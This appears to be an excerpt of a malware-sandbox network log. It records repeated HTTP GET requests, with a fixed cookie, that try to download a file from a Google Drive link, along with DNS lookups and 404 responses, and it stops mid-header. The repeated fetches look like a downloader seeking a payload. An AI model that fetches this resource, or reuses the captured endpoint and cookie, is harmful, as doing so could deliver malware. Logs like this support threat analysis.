      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT7FQZEg2Oh5_IaK8VanZKJaCivWDm8bRNIGOvZxlbqSN4CKtrZi08Wp4bh_VnEhDWYIPt5P0sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:02 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-r2j7nHv8rBykO1328rRtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g; expires=Sun, 13-Jul-2025 03:27:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSSlXKP8L-8uIF3KR10TwURCJYTf2ZHs-yXQ1Y6X0TGqiFPcMD5Zg1AautT6eWBMfTSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PATuXIzGV7I8EryN1XbpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS_7we_Jgz9SeK2_mqLiIIIfmf2FNi-7YaDwpEywJm3MjTx1fsQx0Gyo7vK5vraXFiZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 03:27:06 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MOuZkqASuH69hcgn4wPVag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, 